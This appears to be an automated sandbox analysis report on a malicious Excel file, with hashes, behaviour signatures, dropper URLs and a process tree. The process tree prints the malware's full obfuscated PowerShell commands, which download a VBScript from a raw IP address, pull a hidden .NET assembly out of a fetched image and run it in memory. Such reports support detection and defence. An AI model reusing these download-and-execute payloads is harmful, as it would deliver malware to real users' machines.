Analysis

  • max time kernel
    138s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14-11-2024 02:32

General

  • Target

    62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls

  • Size

    1.1MB

  • MD5

    72d8e169ad35b47ec2c78eca9daf6887

  • SHA1

    4457b65f714f803cbf1206530b4795aa944a75c8

  • SHA256

    62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1

  • SHA512

    7d22b976e78136053965b251ca864afa1366d8322fcf544330549f956025f4aa11985dd2a8577c8365af4a2d77aaeb9c5fcd5dede5d53547e6bd88b57f4dbfce

  • SSDEEP

    24576:nq9PLiijE2Z5Z2am8x/gY/tMJE8F84LJQodszysshMx6YIVf9QCIr+:nEPLiij7Z5ZK8Fg8tMpFjLJQodXsehYo

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1688
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2808
    • C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe
      "C:\Windows\sYStEm32\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe" "pOwerSHeLl.ExE -ex BYPasS -NOp -w 1 -c dEVIcECreDentIAldEplOYmEnT ; iex($(IEx('[sYSTEm.teXt.eNCoDING]'+[cHar]58+[ChaR]0X3a+'UTf8.getsTRiNg([sySTem.COnVERt]'+[CHaR]0X3a+[chAr]0X3A+'frombaSE64STrIng('+[chAR]0x22+'JFNyRkRDMnFKTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iRXJkRWZJbmlUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1vbi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBob0xpVWhiSW9ELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVXSyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZGhzbyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3dUxwdSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInNQUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNyRkRDMnFKTTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yOS82Ni9zZWVteWJlc3RnaXJsdGhpbmtpbmdzaGVpc2Fob3RjaGlja2J1dGZ1dmsudElGIiwiJEVuVjpBUFBEQVRBXHNlZW15YmVzdGdpcmx0aGlua2luZ3NoZWlzYWhvdGNoaWNrYnV0ZnUudmJTIiwwLDApO1N0YXJULXNMZUVwKDMpO3N0YXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3RnaXJsdGhpbmtpbmdzaGVpc2Fob3RjaGlja2J1dGZ1LnZiUyI='+[cHaR]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2552
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPasS -NOp -w 1 -c dEVIcECreDentIAldEplOYmEnT
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1316
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\maf3vcbx.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2600
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFDE0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFDDF.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2360
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemybestgirlthinkingsheisahotchickbutfu.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdMRVJpbWFnZScrJ1VybCA9ICcrJ0RqWmh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrJysnZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYnKycyYycrJzE3MzA5NDUxNzZhMDkwNGYgRGpaO0xFUndlYkNsJysnaScrJ2VudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7TEVSaW1hZ2VCeXRlcyAnKyc9IExFUndlYkNsaWVudC5Eb3dubG9hZERhJysndGEoTEVSaW1hZ2UnKydVcmwpO0xFUmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKExFJysnUmltYWcnKydlQnl0JysnZXMpO0xFUnN0YXJ0RmxhZyA9IERqWjw8QkEnKydTRTY0X1NUQVJUPj5Ealo7TEVSZW5kRmxhZyA9IERqWjw8QkFTRTY0X0VORD4+RGpaO0xFUnN0YXJ0SW5kZXggPSBMRVJpbWFnZVRleHQuSW5kZXhPZihMRVJzdGFydEZsYWcpO0xFUmVuZEluZGV4ID0gTEVSaW1hZ2VUZXh0LkluZGV4T2YoTEVSZW5kRicrJ2xhZyk7TEVSc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIExFUmVuZEluZGV4IC1ndCBMRVJzdGFydEluZGV4O0xFUnN0YXJ0SW5kZXggKz0gTEVSc3RhcicrJ3RGbGFnLkxlbmd0aDtMRVJiYXNlNjRMZW5ndGggPSBMRVJlbmRJbmRleCAtIExFUnN0YXJ0SW5kZXg7TEVSYmFzZTY0Q29tbWFuZCA9JysnIExFUmltYWdlVGV4dC5TdWJzdHJpbmcoTEVSc3RhcnRJbmRleCwgTEVSYmEnKydzZTY0TGVuZ3RoKTtMRVJiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChMRVJiYXNlNjRDb20nKydtYW5kLlRvQ2hhckFycmF5KCkgaTFCIEZvckVhY2gtT2JqZWN0IHsgTEVSXyB9KVstMS4uLShMRVJiYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO0wnKydFUmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoTEVSYmFzZTY0UmV2ZXJzZWQpO0xFUmxvYWRlZEFzcycrJ2VtYmx5ID0gW1N5c3RlbS5SZWYnKydsZWN0JysnaW8nKyduLkFzc2VtYmx5XTo6TCcrJ29hZChMRVJjb21tYW5kQicrJ3l0ZXMpO0xFUnZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy4nKydIb21lXS5HZXRNZXRob2QoRGpaVkFJRGpaKTtMRVJ2YWlNZXRob2QuSW52b2tlKExFUm51bGwsIEAoRGpadHh0LlJSRlRSV1MvNjYvOTIuMDIyLjMuMjkxLy86cHR0aERqWiwgRGpaZGVzYXRpdmFkb0RqWiwgRGpaZGVzYXRpdicrJ2EnKydkJysnb0RqWiwgRGpaZGVzYScrJ3RpdmFkb0RqWiwgRGpaQ2FzUG9sRGpaLCBEalpkZXNhdGl2YWRvRGpaLCBEalpkZXNhdGl2YWRvRGpaLERqWmRlc2F0aXZhZG9EalosRGpaZGUnKydzYXRpdmFkb0RqWixEalpkZXNhdGl2YWRvJysnRCcrJ2paLERqWmRlc2F0aXZhZG9EalosRGpaZGVzYXRpdmFkJysnb0RqWixEaloxRGpaLERqWmRlc2F0aXYnKydhZG9EalopKTsnKS5yZVBMQWNFKChbY0hBUl02OCtbY0hBUl0xMDYrW2NIQVJdOTApLFtTdHJpbmddW2NIQVJdMzkpLnJlUExBY0UoKFtjSEFSXTc2K1tjSEFSXTY5K1tjSEFSXTgyKSxbU3RyaW5nXVtjSEFSXTM2KS5yZVBMQWNFKCdpMUInLCd8JykgfCAmICggJHNIRWxsaURbMV0rJHNIRWxMSURbMTNdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2728
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('LERimage'+'Url = '+'DjZhttps://1017.filemail.com/api/file/get?filek'+'ey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c6'+'2c'+'1730945176a0904f DjZ;LERwebCl'+'i'+'ent = New-Object System.Net.WebClient;LERimageBytes '+'= LERwebClient.DownloadDa'+'ta(LERimage'+'Url);LERimageText = [System.Text.Encoding]::UTF8.GetString(LE'+'Rimag'+'eByt'+'es);LERstartFlag = DjZ<<BA'+'SE64_START>>DjZ;LERendFlag = DjZ<<BASE64_END>>DjZ;LERstartIndex = LERimageText.IndexOf(LERstartFlag);LERendIndex = LERimageText.IndexOf(LERendF'+'lag);LERstartIndex -ge 0 -an'+'d LERendIndex -gt LERstartIndex;LERstartIndex += LERstar'+'tFlag.Length;LERbase64Length = LERendIndex - LERstartIndex;LERbase64Command ='+' LERimageText.Substring(LERstartIndex, LERba'+'se64Length);LERbase64Reversed = -join (LERbase64Com'+'mand.ToCharArray() i1B ForEach-Object { LER_ })[-1..-(LERbase64C'+'ommand.Length)];L'+'ERcommandBytes = [System.Convert]::FromBase64String(LERbase64Reversed);LERloadedAss'+'embly = [System.Ref'+'lect'+'io'+'n.Assembly]::L'+'oad(LERcommandB'+'ytes);LERvaiMethod '+'= [dnlib.IO.'+'Home].GetMethod(DjZVAIDjZ);LERvaiMethod.Invoke(LERnull, @(DjZtxt.RRFTRWS/66/92.022.3.291//:ptthDjZ, DjZdesativadoDjZ, DjZdesativ'+'a'+'d'+'oDjZ, DjZdesa'+'tivadoDjZ, DjZCasPolDjZ, DjZdesativadoDjZ, DjZdesativadoDjZ,DjZdesativadoDjZ,DjZde'+'sativadoDjZ,DjZdesativado'+'D'+'jZ,DjZdesativadoDjZ,DjZdesativad'+'oDjZ,DjZ1DjZ,DjZdesativ'+'adoDjZ));').rePLAcE(([cHAR]68+[cHAR]106+[cHAR]90),[String][cHAR]39).rePLAcE(([cHAR]76+[cHAR]69+[cHAR]82),[String][cHAR]36).rePLAcE('i1B','|') | & ( $sHElliD[1]+$sHElLID[13]+'x')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2180

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

    Filesize

    504B

    MD5

    242d5065f90e2bc0c080bb9f6364c24c

    SHA1

    af40d248dbb2044abc0669d20e384838c48569a7

    SHA256

    6c5a2f0f49738a8fa4ce15c3fb8363d43d76a3cdc2dd6becc236af6e8a66d9ef

    SHA512

    acbabbf7f07be8f3a8e69f87ac56ca41719445666e153062b2d1aac68aace6bb12e58fc79822c9991eec227e3459556d8a31015ab2b56b155ae710d411520cd5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    78d6e86b532460d6aa20a01e6f65bafb

    SHA1

    400a85d03d57d70a88e0ce5a265d99d3c7222032

    SHA256

    580a78542645186ad5b5bbfc30c8dc8f82552a08de70e153f7736798ae56b4f2

    SHA512

    f7c1f250d3fd68b00cd96334de60d40dfbd0e5d36bfd1acdbaba922228aac2dc8013fd44df89da75122a155993cb8d570a4b6c7b36509f88802aa218055e8681

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

    Filesize

    554B

    MD5

    dbd42366febab14b529a5cac9f7a8ef2

    SHA1

    794050d958135f690b60ff0a55604117a338c984

    SHA256

    76a0a60dba64de98b0a62cc85ea7374bfb4b069ee518c2f8b72353ba45d2ba79

    SHA512

    1b42c2328944b2c2333f63307cda81a73d9a03754a337e140ef0804eb93bcf31a4115fe32e57a69433d8349f885f0a4e302c796ee6adc6e8f86bbc6c10a3d066

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\seemebestthingswhichevermadebybestthingsgodown[1].hta

    Filesize

    8KB

    MD5

    57a19193272cc7755de490dccc3be05f

    SHA1

    d56fce9c08083a9d81fa7fda3df780908b5fab21

    SHA256

    8baaf9535735d987a40639a7fe7f78e85c0a8ece06b698d6ae4b740ec63690e2

    SHA512

    ca5149e249b74a159f489afaba983011c9e316ee1850eff2f053c2d3ff4736bc75feb2575e71de66d3889690f50d097041041d1aaa6cc8d8476c71f403032b82

  • C:\Users\Admin\AppData\Local\Temp\CabF48C.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESFDE0.tmp

    Filesize

    1KB

    MD5

    9d6ad1d595b4ea437c13e1ac94916e37

    SHA1

    a3d7b69b455de984b0650bf3f2efc6ddc83459df

    SHA256

    c8c477209979296fbfccc5bd5e850bb402163035c0e196ede6a3b5fd5fdda647

    SHA512

    5a6bb923d6a906206369dd6ec7440b380583db0438192678a01b97bb35d9105a8bfe4e2ea8dcbc09b780f65d03dd3544b276075df3e92f4c85fc9e04306634bd

  • C:\Users\Admin\AppData\Local\Temp\maf3vcbx.dll

    Filesize

    3KB

    MD5

    5797f9e629df47fda90e4647679f6205

    SHA1

    e2faf00dd1ffafcf17a74765d1a72e7a823696f4

    SHA256

    47ffe3bad8fd303da71605f4e8caea09a8bb160a1acfc6d2566d15cc4970428b

    SHA512

    0783b665545a39afe827e9b912a04ff16338b84e8f9acfd2c49bc5ed6870abe7bc932244160cb101938f864c73837b2ba1eca68bbaeddea41e53c6c061a4576c

  • C:\Users\Admin\AppData\Local\Temp\maf3vcbx.pdb

    Filesize

    7KB

    MD5

    c8520981baaa0b724c44477738b32673

    SHA1

    3ecef25bea107b4083ad87dc7111c93f392c2e9c

    SHA256

    dad71dacf700bf8993c74d40e4d0c97caf8e97807b77cfc09780eec06399eb1b

    SHA512

    52a16ebc6074b5b5d42a6063678b49a39fd77941c2f78500e81e4192d34f4984fbd09bf9a3e850d377ff729662b437fcd3acee53c1f944747dd43b5931534d46

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    93f1c4b43c2dc2059a6f2178529e81b0

    SHA1

    8f46e8c9befd7a5fd91c20688d318fe25560d877

    SHA256

    b04948ab214e176efb2c834369d7dbac7a9ab19dba288e57ded6f9cb3d84c273

    SHA512

    26a8ec7fd358aa712adca9ff6a38cca4f9b8e0a63d4b6a6dd3785647a80ca90323893c1709b9fecbdd9b4aaf0eb29d9d64e2df0734c95b09db0530940663efa8

  • C:\Users\Admin\AppData\Roaming\seemybestgirlthinkingsheisahotchickbutfu.vbS

    Filesize

    137KB

    MD5

    b93e8a9bf23aeb31964d63d631ccf365

    SHA1

    05b27d7f62b142a9d88c6ab89eb8ffc5f2299bd4

    SHA256

    75a49d9f596717af29acad09533ed873c76d71ef857aa340e47a5605b209e63f

    SHA512

    46e5f392f462c69158443e1c26361e950452744240638375af4e3926f0b57eb2d0f58fea63a42f998e7da1776ee49cc993d67cc32c2b2aa5244476bc95654062

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCFDDF.tmp

    Filesize

    652B

    MD5

    b5a76fe4c0f7508091afb1d5532b8c55

    SHA1

    7c029a02bd102c8a5e4ece88805d17efbc0d70c9

    SHA256

    ed69485b9ce9b1b54f0a751645c0690e68971d0272caf232a7fad800100c055b

    SHA512

    d9b3be4021d2c1fcefc0664a52080fcc3030d11d0c65afbcb974fdaee9688429d0e4b33e634bf89a8bbd23bd82dab82f769d0936210015330574ba4f8c5c0a8d

  • \??\c:\Users\Admin\AppData\Local\Temp\maf3vcbx.0.cs

    Filesize

    466B

    MD5

    70e878f483525e691692b50ba3aeadd0

    SHA1

    fa16b13bc12663af3d9a7e7dba4e027931cf9ccb

    SHA256

    3de2628d310015c0692133b3509877416f0c20159830c0d9ad45f10109f0bee8

    SHA512

    22cb839c634a7c5dc2c4b00c7c98aaa12bc4c3cc76a096e52004ede5b8f2b79e71670702f4a028b55bf2f411501dff4347cc1947fc345b32c8d957c2d9a31a05

  • \??\c:\Users\Admin\AppData\Local\Temp\maf3vcbx.cmdline

    Filesize

    309B

    MD5

    0a3e165a90496cc782a93ea67a87ee6b

    SHA1

    a6f4e8dd41a07673a2dba02dd386309181003dac

    SHA256

    54a94647adb74deb66bf9ad728bb8e867c87e514223b4fea2e5c97883624f778

    SHA512

    35942f1032082eff903e354e24e1b6337b2ed58455e9b4f3b1c80795cb972c3a4ccf3feb7d742e0b5b4fcf9332fd7eb54f95daa8610d542bd527d69009a08276

  • memory/1688-17-0x00000000023F0000-0x00000000023F2000-memory.dmp

    Filesize

    8KB

  • memory/1688-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1688-1-0x0000000072ADD000-0x0000000072AE8000-memory.dmp

    Filesize

    44KB

  • memory/1688-60-0x0000000072ADD000-0x0000000072AE8000-memory.dmp

    Filesize

    44KB

  • memory/2808-16-0x0000000000990000-0x0000000000992000-memory.dmp

    Filesize

    8KB